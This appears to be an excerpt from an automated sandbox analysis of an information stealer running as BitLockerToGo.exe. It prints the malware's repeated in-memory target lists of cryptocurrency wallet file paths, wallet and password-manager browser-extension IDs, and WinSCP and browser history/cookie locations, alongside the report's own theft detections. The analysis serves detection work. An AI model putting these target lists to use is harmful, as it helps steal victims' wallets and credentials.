Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wallet|1|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Frontier Wallet|1|kppfdiipphfccemcignhifpjkapfbihd|1|0|0|SafePal|1|lgmpcpglpngdoalbgeoldeajfclnhafa|1|0|0|SubWallet - Polkadot Wallet|1|onhogfjeacnfoofkfgppdlbmlmnplgbn|1|0|0|Fluvi Wallet|1|mmmjbcfofconkannjonfmjjajpllddbg|1|0|0|Glass Wallet - Sui Wallet|1|loinekcabhlmhjjbocijdoimmejangoa|1|0|0|Morphis Wallet|1|heefohaffomkkkphnlpohglngmbcclhi|1|0|0|Xverse Wallet|1|idnnbdplmphpflfnlkomgpfbpcgelopg|1|0|0|Compass Wallet for Sei|1|anokgmphncpekkhclmingpimjmcooifb|1|0|0|HAVAH Wallet|1|cnncmdhjacpkmjmkcafchppbnpnhdmon|1|0|0|Elli - Sui Wallet|1|ocjdpmoallmgmjbbogfiiaofphbjgchh|1|0|0|Venom Wallet|1|ojggmchlghnjlapmfbnjholfjkiidbch|1|0|0|Pulse Wallet Chromium|1|ciojocpkclfflombbcfigcijjcbkmhaf|1|0|0|Magic Eden Wal
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp*n
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ata\Roaming\Ledger Live\*.*\
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.**2
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
